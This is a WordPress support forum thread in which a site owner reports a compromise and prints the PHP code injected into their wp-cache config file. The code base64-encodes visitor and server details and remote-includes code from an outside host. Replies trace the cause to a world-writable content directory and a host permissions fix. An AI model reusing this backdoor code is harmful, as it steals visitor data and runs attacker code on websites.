Support » Fixing WordPress » hacked by user7.phpinclude.ru

  • A few days ago WordPress suddenly stopped sending e-mails when a comment was posted. I changed the e-mail address but it did not help. Today when editing a new item I got an error message that with the address http://user7.phpinclude.ru in it. After some searching I found that someone managed to inject the following code in the file wp-cach-config.php in the wp-content directory:

    error_reporting(0);
    $a=(isset($_SERVER[”HTTP_HOST”]) ? $_SERVER[”HTTP_HOST”] : $HTTP_HOST);
    $b=(isset($_SERVER[”SERVER_NAME”]) ? $_SERVER[”SERVER_NAME”] : $SERVER_NAME);
    $c=(isset($_SERVER[”REQUEST_URI”]) ? $_SERVER[”REQUEST_URI”] : $REQUEST_URI);
    $g=(isset($_SERVER[”HTTP_USER_AGENT”]) ? $_SERVER[”HTTP_USER_AGENT”] : $HTTP_USER_AGENT);
    $h=(isset($_SERVER[”REMOTE_ADDR”]) ? $_SERVER[”REMOTE_ADDR”] : $REMOTE_ADDR);
    $n=(isset($_SERVER[”HTTP_REFERER”]) ? $_SERVER[”HTTP_REFERER”] : $HTTP_REFERER);
    $str=base64_encode($a).”.”.base64_encode($b).”.”.base64_encode($c).”.”.base64_encode($g).”.”.base64_encode($h).”.”.base64_encode($n);
    if((include_once(base64_decode(”aHR0cDovLw==”).base64_decode(”dXNlcjcucGhwaW5jbHVkZS5ydQ==”).”/?”.$str))) { } else
    { include_once(base64_decode(”aHR0cDovLw==”).base64_decode(”dXNlcjcucGhwaW5jbHVkZS5ydQ==”).”/?”.$str); }

    Because wp-cache needs a writeable wp-content directory, someone was able to put this in. It sends stuff to phpinclude.ru. Probably to catch e-mail adresses for spam.

    Does anyone know how to prevent this or how to use wp-cache without a writeable wp-content directory?

Viewing 7 replies - 1 through 7 (of 7 total)
  • Another title for this post could be: CHMOD 777 is very dangerous.
    Features of WordPress (upload) and plugins (e.g. WP_Cache and Lazyest Gallery) depend on this. Why is this? How can I use CHMOD 755 on directories used by these features??

    @ macbrink
    It mostly depends on your host. I run sites on 2 differing servers that do fine with 755 – as do others here. However, I’ve installed on plenty that won’t.
    Ask your host to fix this issue.

    I’ll ask them to look into it.

    Features of WordPress (upload) and plugins (e.g. WP_Cache and Lazyest Gallery) depend on this. Why is this?

    Because if you have the webserver able to write files, then you have to make it actually able to write files.

    Those features are not dependent on a chmod of 777, they are dependent on the ability of the webserver to create and write to files. Which means, ultimately, that they depend on the configuration of your webserver. The username it runs as, the permissions associated with that user, etc.

    Hm, so probably the ‘user’ running my WordPress installation does not have enough rights? That should be something my host should take care of.

    This topic has been answered before http://wordpress.org/support/topic/95881?replies=19

    Our host has changed the permissions structure. WordPress and pluging are OK now on CHMOD 755.

Viewing 7 replies - 1 through 7 (of 7 total)
  • The topic ‘hacked by user7.phpinclude.ru’ is closed to new replies.